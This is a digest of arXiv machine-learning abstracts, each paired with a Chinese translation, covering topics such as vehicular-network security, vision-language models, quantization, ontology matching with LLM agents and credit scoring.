领域: cs.LG,cs.AI
DistB-VNET: Distributed Cluster-based Blockchain Vehicular Ad-Hoc Networks through SDN-NFV for Smart City
In the developing topic of smart cities, Vehicular Ad-Hoc Networks (VANETs) are crucial for providing successful interaction between vehicles and infrastructure. This research proposes a distributed Blockchain-based Vehicular Ad-hoc Network (DistB-VNET) architecture that includes binary malicious traffic classification, Software Defined Networking (SDN), and Network Function Virtualization (NFV) to ensure safe, scalable, and reliable vehicular networks in smart cities. The suggested framework is the decentralized blockchain for safe data management and SDN-NFV for dynamic network management and resource efficiency and a noble isolation forest algorithm works as an IDS (Intrusion Detection System). Further, "DistB-VNET" offers a dual-layer blockchain system, where a distributed blockchain provides safe communication between vehicles, while a centralized blockchain in the cloud is in charge of data verification and storage. This improves security, scalability, and adaptability, ensuring better traffic management, data security, and privacy in VANETs. Furthermore, the unsupervised isolation forest model achieves a high accuracy of 99.23% for detecting malicious traffic. Additionally, reveals that our method greatly improves network performance, offering decreased latency, increased security, and reduced congestion, an effective alternative for existing smart city infrastructures.
Updated: 2024-12-05 14:55:05
标题: DistB-VNET:通过SDN-NFV实现的分布式基于集群的区块链车载自组织网络,用于智慧城市
摘要: 在智能城市这一发展话题中,车辆自组网(VANETs)对于提供车辆和基础设施之间成功互动至关重要。本研究提出了一个分布式基于区块链的车辆自组网(DistB-VNET)架构,该架构包括二进制恶意流量分类、软件定义网络(SDN)和网络功能虚拟化(NFV),以确保智能城市中安全、可扩展和可靠的车辆网络。建议的框架是用于安全数据管理的分散式区块链,以及用于动态网络管理和资源效率的SDN-NFV,而一种新颖的隔离森林算法充当入侵检测系统(IDS)。此外,“DistB-VNET”提供了一个双层区块链系统,其中分布式区块链提供车辆之间安全通信,而云端的集中式区块链负责数据验证和存储。这提高了安全性、可扩展性和适应性,确保了VANETs中更好的交通管理、数据安全和隐私。此外,无监督的隔离森林模型实现了对恶意流量的高达99.23%的准确性检测。此外,研究表明我们的方法极大地提高了网络性能,提供了较低的延迟、增强的安全性和减少的拥塞,是现有智能城市基础设施的有效替代方案。
更新时间: 2024-12-05 14:55:05
领域: cs.CR
Customize Segment Anything Model for Multi-Modal Semantic Segmentation with Mixture of LoRA Experts
The recent Segment Anything Model (SAM) represents a significant breakthrough in scaling segmentation models, delivering strong performance across various downstream applications in the RGB modality. However, directly applying SAM to emerging visual modalities, such as depth and event data results in suboptimal performance in multi-modal segmentation tasks. In this paper, we make the first attempt to adapt SAM for multi-modal semantic segmentation by proposing a Mixture of Low-Rank Adaptation Experts (MoE-LoRA) tailored for different input visual modalities. By training only the MoE-LoRA layers while keeping SAM's weights frozen, SAM's strong generalization and segmentation capabilities can be preserved for downstream tasks. Specifically, to address cross-modal inconsistencies, we propose a novel MoE routing strategy that adaptively generates weighted features across modalities, enhancing multi-modal feature integration. Additionally, we incorporate multi-scale feature extraction and fusion by adapting SAM's segmentation head and introducing an auxiliary segmentation head to combine multi-scale features for improved segmentation performance effectively. Extensive experiments were conducted on three multi-modal benchmarks: DELIVER, MUSES, and MCubeS. The results consistently demonstrate that the proposed method significantly outperforms state-of-the-art approaches across diverse scenarios. Notably, under the particularly challenging condition of missing modalities, our approach exhibits a substantial performance gain, achieving an improvement of 32.15% compared to existing methods.
Updated: 2024-12-05 14:54:31
标题: 为多模式语义分割定制分段任意模型,使用混合的LoRA专家
摘要: 最近的分段任意模型(SAM)代表了分割模型方面的重大突破,在RGB模态下在各种下游应用中表现出色。然而,直接将SAM应用于新兴的视觉模态,如深度和事件数据,会导致多模态分割任务的性能不佳。在本文中,我们首次尝试通过提出适用于不同输入视觉模态的低秩适应专家混合(MoE-LoRA)来使SAM适应多模态语义分割。通过仅训练MoE-LoRA层,同时保持SAM的权重冻结,可以保留SAM在下游任务中的强大泛化和分割能力。具体来说,为了解决跨模态不一致性,我们提出了一种新颖的MoE路由策略,自适应地生成跨模态的加权特征,增强多模态特征集成。此外,我们通过调整SAM的分割头部并引入辅助分割头部,将多尺度特征提取和融合结合起来,有效地提高了分割性能。我们在三个多模态基准数据集DELIVER、MUSES和MCubeS上进行了大量实验。结果一致表明,所提出的方法在各种情景下明显优于现有方法。值得注意的是,在特别具有挑战性的缺失模态条件下,我们的方法表现出显著的性能提升,与现有方法相比,提高了32.15%。
更新时间: 2024-12-05 14:54:31
领域: cs.CV,cs.AI
MetricGold: Leveraging Text-To-Image Latent Diffusion Models for Metric Depth Estimation
Recovering metric depth from a single image remains a fundamental challenge in computer vision, requiring both scene understanding and accurate scaling. While deep learning has advanced monocular depth estimation, current models often struggle with unfamiliar scenes and layouts, particularly in zero-shot scenarios and when predicting scale-ergodic metric depth. We present MetricGold, a novel approach that harnesses generative diffusion model's rich priors to improve metric depth estimation. Building upon recent advances in MariGold, DDVM and Depth Anything V2 respectively, our method combines latent diffusion, log-scaled metric depth representation, and synthetic data training. MetricGold achieves efficient training on a single RTX 3090 within two days using photo-realistic synthetic data from HyperSIM, VirtualKitti, and TartanAir. Our experiments demonstrate robust generalization across diverse datasets, producing sharper and higher quality metric depth estimates compared to existing approaches.
Updated: 2024-12-05 14:51:55
标题: MetricGold:利用文本到图像潜在扩散模型进行度量深度估计
摘要: 从一张单独的图像恢复度量深度仍然是计算机视觉中的一个基本挑战,需要对场景的理解和准确的尺度。虽然深度学习已经推动了单眼深度估计的发展,但当前模型在处理陌生场景和布局时经常遇到困难,特别是在零样本场景和预测尺度遍历度量深度时。我们提出了MetricGold,这是一种利用生成扩散模型丰富的先验知识来改进度量深度估计的新方法。借鉴最近在MariGold、DDVM和Depth Anything V2方面的进展,我们的方法结合了潜在扩散、对数尺度的度量深度表示和合成数据训练。MetricGold在单个RTX 3090上的两天内使用来自HyperSIM、VirtualKitti和TartanAir的逼真合成数据实现了高效的训练。我们的实验表明,与现有方法相比,MetricGold在各种数据集上具有强大的泛化能力,产生更清晰、更高质量的度量深度估计结果。
更新时间: 2024-12-05 14:51:55
领域: cs.CV,cs.AI,cs.GR,cs.RO
Physics-informed Deep Learning for Muscle Force Prediction with Unlabeled sEMG Signals
Computational biomechanical analysis plays a pivotal role in understanding and improving human movements and physical functions. Although physics-based modeling methods can interpret the dynamic interaction between the neural drive to muscle dynamics and joint kinematics, they suffer from high computational latency. In recent years, data-driven methods have emerged as a promising alternative due to their fast execution speed, but label information is still required during training, which is not easy to acquire in practice. To tackle these issues, this paper presents a novel physics-informed deep learning method to predict muscle forces without any label information during model training. In addition, the proposed method could also identify personalized muscle-tendon parameters. To achieve this, the Hill muscle model-based forward dynamics is embedded into the deep neural network as the additional loss to further regulate the behavior of the deep neural network. Experimental validations on the wrist joint from six healthy subjects are performed, and a fully connected neural network (FNN) is selected to implement the proposed method. The predicted results of muscle forces show comparable or even lower root mean square error (RMSE) and higher coefficient of determination compared with baseline methods, which have to use the labeled surface electromyography (sEMG) signals, and it can also identify muscle-tendon parameters accurately, demonstrating the effectiveness of the proposed physics-informed deep learning method.
Updated: 2024-12-05 14:47:38
标题: 物理学信息深度学习用于无标签sEMG信号的肌肉力预测
摘要: 计算生物力学分析在理解和改善人类运动和身体功能方面发挥着关键作用。尽管基于物理的建模方法可以解释神经驱动到肌肉动力学和关节运动之间的动态相互作用,但它们存在较高的计算延迟。近年来,数据驱动方法已经成为一种具有快速执行速度的有希望的替代方法,但在训练过程中仍然需要标签信息,这在实践中并不容易获取。为了解决这些问题,本文提出了一种新颖的物理信息深度学习方法,可以在模型训练过程中预测肌肉力而无需任何标签信息。此外,所提出的方法还可以识别个性化的肌腱参数。为了实现这一目标,基于希尔肌肉模型的前向动力学被嵌入到深度神经网络中作为额外的损失,以进一步调节深度神经网络的行为。对来自六名健康受试者的腕关节进行了实验验证,并选择了全连接神经网络(FNN)来实施所提出的方法。肌肉力的预测结果显示与基准方法相比,根均方误差(RMSE)相当或甚至更低,确定系数更高,而基准方法需要使用标记的表面肌电图(sEMG)信号,并且还可以准确识别肌腱参数,证明了所提出的物理信息深度学习方法的有效性。
更新时间: 2024-12-05 14:47:38
领域: cs.LG,cs.HC,eess.SP,physics.bio-ph
Agent-OM: Leveraging LLM Agents for Ontology Matching
Ontology matching (OM) enables semantic interoperability between different ontologies and resolves their conceptual heterogeneity by aligning related entities. OM systems currently have two prevailing design paradigms: conventional knowledge-based expert systems and newer machine learning-based predictive systems. While large language models (LLMs) and LLM agents have revolutionised data engineering and have been applied creatively in many domains, their potential for OM remains underexplored. This study introduces a novel agent-powered LLM-based design paradigm for OM systems. With consideration of several specific challenges in leveraging LLM agents for OM, we propose a generic framework, namely Agent-OM (Agent for Ontology Matching), consisting of two Siamese agents for retrieval and matching, with a set of simple OM tools. Our framework is implemented in a proof-of-concept system. Evaluations of three Ontology Alignment Evaluation Initiative (OAEI) tracks over state-of-the-art OM systems show that our system can achieve results very close to the long-standing best performance on simple OM tasks and can significantly improve the performance on complex and few-shot OM tasks.
Updated: 2024-12-05 14:45:05
标题: Agent-OM:利用LLM代理进行本体匹配
摘要: 本文研究了本体匹配(OM)在不同本体之间实现语义互操作性,并通过对齐相关实体解决其概念异构性的能力。OM系统目前有两种主流设计范式:传统基于知识的专家系统和新型基于机器学习的预测系统。尽管大型语言模型(LLMs)和LLM代理已经在数据工程中实现了革命性进展,并在许多领域中得到了创造性应用,但它们在OM方面的潜力仍未得到充分挖掘。本研究介绍了一种基于代理的LLM设计范式,用于OM系统。考虑到利用LLM代理进行OM所面临的几个特定挑战,我们提出了一个通用框架,即Agent-OM(Agent for Ontology Matching),包括用于检索和匹配的两个Siamese代理以及一组简单的OM工具。我们的框架在一个概念验证系统中实施。对三个本体对齐评估倡议(OAEI)跟踪的评估结果显示,我们的系统在简单的OM任务上可以实现非常接近长期最佳性能,并且可以显著提高复杂和少样本OM任务的性能。
更新时间: 2024-12-05 14:45:05
领域: cs.AI,cs.CL,cs.IR
Relationships between Keywords and Strong Beats in Lyrical Music
Artificial Intelligence (AI) song generation has emerged as a popular topic, yet the focus on exploring the latent correlations between specific lyrical and rhythmic features remains limited. In contrast, this pilot study particularly investigates the relationships between keywords and rhythmically stressed features such as strong beats in songs. It focuses on several key elements: keywords or non-keywords, stressed or unstressed syllables, and strong or weak beats, with the aim of uncovering insightful correlations. Experimental results indicate that, on average, 80.8\% of keywords land on strong beats, whereas 62\% of non-keywords fall on weak beats. The relationship between stressed syllables and strong or weak beats is weak, revealing that keywords have the strongest relationships with strong beats. Additionally, the lyrics-rhythm matching score, a key matching metric measuring keywords on strong beats and non-keywords on weak beats across various time signatures, is 0.765, while the matching score for syllable types is 0.495. This study demonstrates that word types strongly align with their corresponding beat types, as evidenced by the distinct patterns, whereas syllable types exhibit a much weaker alignment. This disparity underscores the greater reliability of word types in capturing rhythmic structures in music, highlighting their crucial role in effective rhythmic matching and analysis. We also conclude that keywords that consistently align with strong beats are more reliable indicators of lyrics-rhythm associations, providing valuable insights for AI-driven song generation through enhanced structural analysis. Furthermore, our development of tailored Lyrics-Rhythm Matching (LRM) metrics maximizes lyrical alignments with corresponding beat stresses, and our novel LRM file format captures critical lyrical and rhythmic information without needing original sheet music.
Updated: 2024-12-05 14:40:27
标题: 关键词与歌词音乐中强拍的关系
摘要: 人工智能(AI)歌曲生成已成为一个热门话题,然而,对特定歌词和节奏特征之间潜在关联的探索仍然有限。相比之下,这项试点研究特别调查了关键词和节奏强调特征(如歌曲中的强拍)之间的关系。它关注几个关键元素:关键词或非关键词、重音或非重音音节、强拍或弱拍,旨在揭示深刻的相关性。实验结果表明,平均80.8\%的关键词落在强拍上,而62\%的非关键词落在弱拍上。重音音节与强拍或弱拍之间的关系较弱,显示出关键词与强拍之间的最强关系。此外,歌词-节奏匹配得分,一个关键的匹配度量标准,衡量了关键词在强拍上和非关键词在弱拍上的匹配情况跨不同的拍子,为0.765,而音节类型的匹配得分为0.495。这项研究表明,单词类型与其对应的节拍类型强烈一致,据独特的模式证实,而音节类型显示出更弱的一致性。这种差异强调了单词类型在捕捉音乐的节奏结构方面更可靠,突显了它们在有效节奏匹配和分析中的关键作用。我们还得出结论,与强拍一致的关键词是更可靠的歌词-节奏关联指标,通过增强结构分析为AI驱动的歌曲生成提供宝贵的见解。此外,我们开发了定制的歌词-节奏匹配(LRM)度量标准,最大化了歌词与相应的强拍之间的匹配,我们的新颖的LRM文件格式能够捕捉关键的歌词和节奏信息,而无需原始乐谱。
更新时间: 2024-12-05 14:40:27
领域: cs.SD,cs.AI,eess.AS
Spatio-Temporal Context Prompting for Zero-Shot Action Detection
Spatio-temporal action detection encompasses the tasks of localizing and classifying individual actions within a video. Recent works aim to enhance this process by incorporating interaction modeling, which captures the relationship between people and their surrounding context. However, these approaches have primarily focused on fully-supervised learning, and the current limitation lies in the lack of generalization capability to recognize unseen action categories. In this paper, we aim to adapt the pretrained image-language models to detect unseen actions. To this end, we propose a method which can effectively leverage the rich knowledge of visual-language models to perform Person-Context Interaction. Meanwhile, our Context Prompting module will utilize contextual information to prompt labels, thereby enhancing the generation of more representative text features. Moreover, to address the challenge of recognizing distinct actions by multiple people at the same timestamp, we design the Interest Token Spotting mechanism which employs pretrained visual knowledge to find each person's interest context tokens, and then these tokens will be used for prompting to generate text features tailored to each individual. To evaluate the ability to detect unseen actions, we propose a comprehensive benchmark on J-HMDB, UCF101-24, and AVA datasets. The experiments show that our method achieves superior results compared to previous approaches and can be further extended to multi-action videos, bringing it closer to real-world applications. The code and data can be found in https://webber2933.github.io/ST-CLIP-project-page.
Updated: 2024-12-05 14:38:12
标题: 时空上下文提示对于零样本行为检测的影响
摘要: 时空动作检测涵盖了在视频中定位和分类个别动作的任务。最近的研究旨在通过整合互动建模来增强这一过程,该建模捕捉了人与周围环境之间的关系。然而,这些方法主要集中在全监督学习上,当前的局限性在于缺乏泛化能力以识别未见动作类别。在本文中,我们旨在将预训练的图像-语言模型调整为检测未见动作。为此,我们提出了一种方法,可以有效利用视觉-语言模型的丰富知识来执行人-环境交互。与此同时,我们的上下文提示模块将利用上下文信息提示标签,从而增强生成更具代表性的文本特征。此外,为了解决在同一时间戳由多个人识别不同动作的挑战,我们设计了兴趣令牌定位机制,该机制利用预训练的视觉知识找到每个人的兴趣上下文令牌,然后这些令牌将用于提示生成针对每个个体量身定制的文本特征。为了评估检测未见动作的能力,我们在J-HMDB、UCF101-24和AVA数据集上提出了一个全面的基准。实验表明,与以前的方法相比,我们的方法取得了更优秀的结果,并且可以进一步扩展到多动作视频,使其更接近实际应用。代码和数据可以在https://webber2933.github.io/ST-CLIP-project-page 找到。
更新时间: 2024-12-05 14:38:12
领域: cs.CV,cs.AI
On the Benefits of Active Data Collection in Operator Learning
We investigate active data collection strategies for operator learning when the target operator is linear and the input functions are drawn from a mean-zero stochastic process with continuous covariance kernels. With an active data collection strategy, we establish an error convergence rate in terms of the decay rate of the eigenvalues of the covariance kernel. Thus, with sufficiently rapid eigenvalue decay of the covariance kernels, arbitrarily fast error convergence rates can be achieved. This contrasts with the passive (i.i.d.) data collection strategies, where the convergence rate is never faster than $\sim n^{-1}$. In fact, for our setting, we establish a \emph{non-vanishing} lower bound for any passive data collection strategy, regardless of the eigenvalues decay rate of the covariance kernel. Overall, our results show the benefit of active over passive data collection strategies in operator learning.
Updated: 2024-12-05 14:34:08
标题: 关于运营商学习中主动数据收集的益处
摘要: 我们研究了在目标运算符为线性且输入函数来自具有连续协方差核的均值为零的随机过程时的主动数据收集策略。通过主动数据收集策略,我们建立了一个关于协方差核特征值衰减率的误差收敛速度。因此,通过具有足够快的协方差核特征值衰减率,可以实现任意快的误差收敛速度。这与被动(独立同分布)数据收集策略形成对比,其中收敛速度永远不会快于$ \sim n^{-1}$。事实上,对于我们的设置,我们建立了一个\emph{非消失}的下界,适用于任何被动数据收集策略,无论协方差核特征值的衰减率如何。总的来说,我们的结果表明在运算符学习中主动数据收集策略比被动数据收集策略更有益处。
更新时间: 2024-12-05 14:34:08
领域: stat.ML,cs.LG
Fast and reliable uncertainty quantification with neural network ensembles for industrial image classification
Image classification with neural networks (NNs) is widely used in industrial processes, situations where the model likely encounters unknown objects during deployment, i.e., out-of-distribution (OOD) data. Worryingly, NNs tend to make confident yet incorrect predictions when confronted with OOD data. To increase the models' reliability, they should quantify the uncertainty in their own predictions, communicating when the output should (not) be trusted. Deep ensembles, composed of multiple independent NNs, have been shown to perform strongly but are computationally expensive. Recent research has proposed more efficient NN ensembles, namely the snapshot, batch, and multi-input multi-output ensemble. This study investigates the predictive and uncertainty performance of efficient NN ensembles in the context of image classification for industrial processes. It is the first to provide a comprehensive comparison and it proposes a novel Diversity Quality metric to quantify the ensembles' performance on the in-distribution and OOD sets in one single metric. The results highlight the batch ensemble as a cost-effective and competitive alternative to the deep ensemble. It matches the deep ensemble in both uncertainty and accuracy while exhibiting considerable savings in training time, test time, and memory storage.
Updated: 2024-12-05 14:30:41
标题: 快速可靠的神经网络集成不确定性量化用于工业图像分类
摘要: 使用神经网络(NNs)进行图像分类在工业过程中被广泛应用,情况下模型可能在部署过程中遇到未知对象,即超出分布(OOD)数据。令人担忧的是,当面对OOD数据时,NNs往往会做出自信但不正确的预测。为了增加模型的可靠性,它们应该量化自己预测中的不确定性,传达何时应(不应)信任输出。由多个独立NNs组成的深度集合已被证明具有良好的性能,但计算成本昂贵。最近的研究提出了更有效的NN集合,即快照、批量和多输入多输出集合。本研究调查了在工业过程图像分类的背景下,有效NN集合的预测和不确定性性能。它是第一个提供全面比较并提出新的多样性质量度量来量化集合在一个单一指标上在分布和OOD集合上的性能。结果突出了批量集合作为深度集合的成本效益和竞争性替代方案。它在不确定性和准确性方面与深度集合相匹配,同时在训练时间、测试时间和内存存储方面节省了相当多。
更新时间: 2024-12-05 14:30:41
领域: cs.LG,stat.ML
Directed Structural Adaptation to Overcome Statistical Conflicts and Enable Continual Learning
Adaptive networks today rely on overparameterized fixed topologies that cannot break through the statistical conflicts they encounter in the data they are exposed to, and are prone to "catastrophic forgetting" as the network attempts to reuse the existing structures to learn new task. We propose a structural adaptation method, DIRAD, that can complexify as needed and in a directed manner without being limited by statistical conflicts within a dataset. We then extend this method and present the PREVAL framework, designed to prevent "catastrophic forgetting" in continual learning by detection of new data and assigning encountered data to suitable models adapted to process them, without needing task labels anywhere in the workflow. We show the reliability of the DIRAD in growing a network with high performance and orders-of-magnitude simpler than fixed topology networks; and demonstrate the proof-of-concept operation of PREVAL, in which continual adaptation to new tasks is observed while being able to detect and discern previously-encountered tasks.
Updated: 2024-12-05 14:30:18
标题: 定向结构适应以克服统计冲突并实现持续学习
摘要: 当今的自适应网络依赖于参数过多的固定拓扑结构,无法克服它们在暴露的数据中遇到的统计冲突,并且容易出现“灾难性遗忘”,因为网络试图重复使用现有结构来学习新任务。我们提出了一种结构适应方法DIRAD,可以根据需要以有序的方式复杂化,而不受数据集内的统计冲突的限制。然后,我们扩展了这种方法并提出了PREVAL框架,旨在通过检测新数据并将遇到的数据分配给适合处理它们的模型,以防止在不需要任务标签的情况下发生“灾难性遗忘”持续学习。我们展示了DIRAD在增长具有高性能且比固定拓扑网络简单几个数量级的网络方面的可靠性;并演示了PREVAL的概念验证操作,在其中观察到对新任务的持续适应能力,同时能够检测和区分先前遇到的任务。
更新时间: 2024-12-05 14:30:18
领域: cs.LG,cs.AI
Molmo and PixMo: Open Weights and Open Data for State-of-the-Art Vision-Language Models
Today's most advanced vision-language models (VLMs) remain proprietary. The strongest open-weight models rely heavily on synthetic data from proprietary VLMs to achieve good performance, effectively distilling these closed VLMs into open ones. As a result, the community has been missing foundational knowledge about how to build performant VLMs from scratch. We present Molmo, a new family of VLMs that are state-of-the-art in their class of openness. Our key contribution is a collection of new datasets called PixMo, including a dataset of highly detailed image captions for pre-training, a free-form image Q&A dataset for fine-tuning, and an innovative 2D pointing dataset, all collected without the use of external VLMs. The success of our approach relies on careful modeling choices, a well-tuned training pipeline, and, most critically, the quality of our newly collected datasets. Our best-in-class 72B model not only outperforms others in the class of open weight and data models, but also outperforms larger proprietary models including Claude 3.5 Sonnet, and Gemini 1.5 Pro and Flash, second only to GPT-4o based on both academic benchmarks and on a large human evaluation. Our model weights, new datasets, and source code are available at https://molmo.allenai.org/blog.
Updated: 2024-12-05 14:28:40
标题: Molmo和PixMo:用于最先进的视觉-语言模型的开放权重和开放数据
摘要: 目前最先进的视觉语言模型(VLMs)仍然是专有的。最强大的开放权重模型在很大程度上依赖于专有VLMs的合成数据,以实现良好的性能,有效地将这些闭合的VLMs提炼成开放的。因此,社区一直缺乏如何从零开始构建高性能VLMs的基础知识。我们提出了Molmo,这是一种在其开放性类别中处于最前沿的新型VLMs系列。我们的主要贡献是一组名为PixMo的新数据集,包括用于预训练的高度详细的图像标题数据集,用于微调的自由形式图像问答数据集,以及一种创新的2D指向数据集,所有这些数据集均在没有使用外部VLMs的情况下收集。我们方法的成功依赖于谨慎的建模选择、良好调整的训练流程,以及最重要的是我们新收集数据集的质量。我们的最佳72B模型不仅在开放权重和数据模型类别中胜过其他模型,而且在学术基准测试和大规模人类评估中也胜过更大的专有模型,包括Claude 3.5 Sonnet和Gemini 1.5 Pro和Flash,仅次于基于GPT-4o的模型。我们的模型权重、新数据集和源代码可在https://molmo.allenai.org/blog上获得。
更新时间: 2024-12-05 14:28:40
领域: cs.CV,cs.CL,cs.LG
Leveraging Large Language Models to Generate Course-specific Semantically Annotated Learning Objects
Background: Over the past few decades, the process and methodology of automated question generation (AQG) have undergone significant transformations. Recent progress in generative natural language models has opened up new potential in the generation of educational content. Objectives: This paper explores the potential of large language models (LLMs) for generating computer science questions that are sufficiently annotated for automatic learner model updates, are fully situated in the context of a particular course, and address the cognitive dimension understand. Methods: Unlike previous attempts that might use basic methods like ChatGPT, our approach involves more targeted strategies such as retrieval-augmented generation (RAG) to produce contextually relevant and pedagogically meaningful learning objects. Results and Conclusions: Our results show that generating structural, semantic annotations works well. However, this success was not reflected in the case of relational annotations. The quality of the generated questions often did not meet educational standards, highlighting that although LLMs can contribute to the pool of learning materials, their current level of performance requires significant human intervention to refine and validate the generated content.
Updated: 2024-12-05 14:24:07
标题: 利用大型语言模型生成课程特定的语义标注学习对象
摘要: 背景:在过去的几十年里,自动化问题生成(AQG)的过程和方法论发生了重大变革。生成式自然语言模型的最新进展为教育内容生成开辟了新的潜力。 目标:本文探讨了大型语言模型(LLMs)在生成计算机科学问题方面的潜力,这些问题被充分注释以便进行自动学习模型更新,完全处于特定课程的情境中,并解决认知维度理解的问题。 方法:与以往可能使用基本方法如ChatGPT不同,我们的方法涉及更具针对性的策略,如检索增强生成(RAG),以产生具有情境相关性和教育意义的学习对象。 结果和结论:我们的结果显示,生成结构化、语义注释效果良好。然而,在关系注释的情况下,这种成功并未得到体现。生成的问题质量通常未达到教育标准,突显出尽管LLMs可以为学习材料库做出贡献,但其当前性能水平需要人类干预来完善和验证生成的内容。
更新时间: 2024-12-05 14:24:07
领域: cs.AI
Linear Discriminant Analysis in Credit Scoring: A Transparent Hybrid Model Approach
The development of computing has made credit scoring approaches possible, with various machine learning (ML) and deep learning (DL) techniques becoming more and more valuable. While complex models yield more accurate predictions, their interpretability is often weakened, which is a concern for credit scoring that places importance on decision fairness. As features of the dataset are a crucial factor for the credit scoring system, we implement Linear Discriminant Analysis (LDA) as a feature reduction technique, which reduces the burden of the models complexity. We compared 6 different machine learning models, 1 deep learning model, and a hybrid model with and without using LDA. From the result, we have found our hybrid model, XG-DNN, outperformed other models with the highest accuracy of 99.45% and a 99% F1 score with LDA. Lastly, to interpret model decisions, we have applied 2 different explainable AI techniques named LIME (local) and Morris Sensitivity Analysis (global). Through this research, we showed how feature reduction techniques can be used without affecting the performance and explainability of the model, which can be very useful in resource-constrained settings to optimize the computational workload.
Updated: 2024-12-05 14:21:18
标题: 信用评分中的线性判别分析:一种透明的混合模型方法
摘要: 计算机技术的发展使得信用评分方法成为可能,各种机器学习(ML)和深度学习(DL)技术变得越来越有价值。尽管复杂模型可以产生更准确的预测,但它们的可解释性通常会受到削弱,这对于注重决策公平的信用评分来说是一个关键问题。由于数据集的特征是信用评分系统的关键因素,我们实现了线性判别分析(LDA)作为一种特征降维技术,可以减少模型复杂性的负担。我们比较了6种不同的机器学习模型、1种深度学习模型以及一种混合模型,分别使用和不使用LDA。从结果中,我们发现我们的混合模型XG-DNN,在使用LDA时性能优于其他模型,准确率最高达到99.45%,F1得分为99%。最后,为了解释模型的决策,我们应用了两种不同的可解释人工智能技术,分别是LIME(局部)和Morris敏感性分析(全局)。通过这项研究,我们展示了如何使用特征降维技术而不影响模型的性能和可解释性,这在资源受限的环境中可以非常有用,以优化计算工作量。
更新时间: 2024-12-05 14:21:18
领域: cs.LG
SKIM: Any-bit Quantization Pushing The Limits of Post-Training Quantization
Large Language Models (LLMs) exhibit impressive performance across various tasks, but deploying them for inference poses challenges. Their high resource demands often necessitate complex, costly multi-GPU pipelines, or the use of smaller, less capable models. While quantization offers a promising solution utilizing lower precision for model storage, existing methods frequently experience significant performance drops at lower precision levels. Additionally, they typically provide only a limited set of solutions at specific bit levels, many of which are extensively manually tuned. To address these challenges, we propose a new method called SKIM: Scaled K-means clustering wIth Mixed precision. Our approach introduces two novel techniques: 1. A greedy algorithm to solve approximately optimal bit allocation across weight channels, and 2. A trainable scaling vector for non-differentiable K-means clustering. These techniques substantially improve performance and can be adapted to any given bit. Notably, in terms of model perplexity, our method narrows the gap between 3-bit quantized LLaMA models and their full precision counterparts by 16.3% on average.
Updated: 2024-12-05 14:19:59
标题: SKIM:任意比特量化推动后训练量化的极限
摘要: 大型语言模型(LLMs)在各种任务中表现出令人印象深刻的性能,但将它们部署用于推断面临挑战。它们高资源需求通常需要复杂、昂贵的多GPU管道,或者使用容量较小、能力较弱的模型。虽然量化为模型存储提供了一种有前途的解决方案,但现有方法在较低精度水平上经常出现显著的性能下降。此外,它们通常只在特定比特级别上提供一组有限的解决方案,其中许多是经过大量手动调整的。为了解决这些挑战,我们提出了一种名为SKIM的新方法:带混合精度的缩放K均值聚类。我们的方法引入了两种新技术:1. 一种贪婪算法,可解决跨权重通道的近似最优比特分配问题;2. 一种用于非可微K均值聚类的可训练缩放向量。这些技术显著改善了性能,并可以适应任何给定的比特。值得注意的是,在模型困惑度方面,我们的方法将3比特量化的LLaMA模型与完整精度对应模型之间的差距平均缩小了16.3%。
更新时间: 2024-12-05 14:19:59
领域: cs.LG
Multi-Layer Privacy-Preserving Record Linkage with Clerical Review based on gradual information disclosure
Privacy-Preserving Record linkage (PPRL) is an essential component in data integration tasks of sensitive information. The linkage quality determines the usability of combined datasets and (machine learning) applications based on them. We present a novel privacy-preserving protocol that integrates clerical review in PPRL using a multi-layer active learning process. Uncertain match candidates are reviewed on several layers by human and non-human oracles to reduce the amount of disclosed information per record and in total. Predictions are propagated back to update previous layers, resulting in an improved linkage performance for non-reviewed candidates as well. The data owners remain in control of the amount of information they share for each record. Therefore, our approach follows need-to-know and data sovereignty principles. The experimental evaluation on real-world datasets shows considerable linkage quality improvements with limited labeling effort and privacy risks.
Updated: 2024-12-05 14:18:50
标题: 基于逐步信息披露的多层隐私保护记录链接与文员审查
摘要: 隐私保护记录链接(PPRL)是敏感信息数据整合任务中的一个重要组成部分。链接质量决定了合并数据集和(基于它们的机器学习)应用的可用性。我们提出了一种新颖的隐私保护协议,通过多层主动学习过程在PPRL中集成了文书审查。不确定的匹配候选者通过人类和非人类神谕在多个层面上进行审查,以减少每个记录和总体上披露的信息量。预测结果被传播回更新先前的层,从而改善未经审查的候选者的链接性能。数据所有者仍然控制着他们为每个记录分享的信息量。因此,我们的方法遵循需要知道和数据主权原则。对真实数据集的实验评估显示,通过有限的标注工作和隐私风险,链接质量得到了显著改善。
更新时间: 2024-12-05 14:18:50
领域: cs.CR,cs.DB,cs.LG
Fixed-Mean Gaussian Processes for Post-hoc Bayesian Deep Learning
Recently, there has been an increasing interest in performing post-hoc uncertainty estimation about the predictions of pre-trained deep neural networks (DNNs). Given a pre-trained DNN via back-propagation, these methods enhance the original network by adding output confidence measures, such as error bars, without compromising its initial accuracy. In this context, we introduce a novel family of sparse variational Gaussian processes (GPs), where the posterior mean is fixed to any continuous function when using a universal kernel. Specifically, we fix the mean of this GP to the output of the pre-trained DNN, allowing our approach to effectively fit the GP's predictive variances to estimate the DNN prediction uncertainty. Our approach leverages variational inference (VI) for efficient stochastic optimization, with training costs that remain independent of the number of training points, scaling efficiently to large datasets such as ImageNet. The proposed method, called fixed mean GP (FMGP), is architecture-agnostic, relying solely on the pre-trained model's outputs to adjust the predictive variances. Experimental results demonstrate that FMGP improves both uncertainty estimation and computational efficiency when compared to state-of-the-art methods.
Updated: 2024-12-05 14:17:16
标题: 固定均值的高斯过程用于事后贝叶斯深度学习
摘要: 最近,对于对预先训练的深度神经网络(DNNs)的预测进行事后不确定性估计越来越感兴趣。通过反向传播给定一个预先训练的DNN,这些方法通过添加输出置信度测量,如误差条,来增强原始网络,而不会影响其初始准确性。在这个背景下,我们介绍了一种新颖的稀疏变分高斯过程(GPs)家族,其中后验均值在使用通用核时被固定为任何连续函数。具体来说,我们将这个GP的均值固定为预训练DNN的输出,从而使我们的方法能够有效地拟合GP的预测方差以估计DNN的预测不确定性。我们的方法利用变分推断(VI)进行高效的随机优化,训练成本与训练点的数量无关,从而能够有效地扩展到像ImageNet这样的大型数据集。提出的方法称为固定均值GP(FMGP),与架构无关,仅依赖于预先训练模型的输出来调整预测方差。实验结果表明,与最先进的方法相比,FMGP在不确定性估计和计算效率方面都有所提高。
更新时间: 2024-12-05 14:17:16
领域: cs.LG,stat.ML
Adaptive Circuit Behavior and Generalization in Mechanistic Interpretability
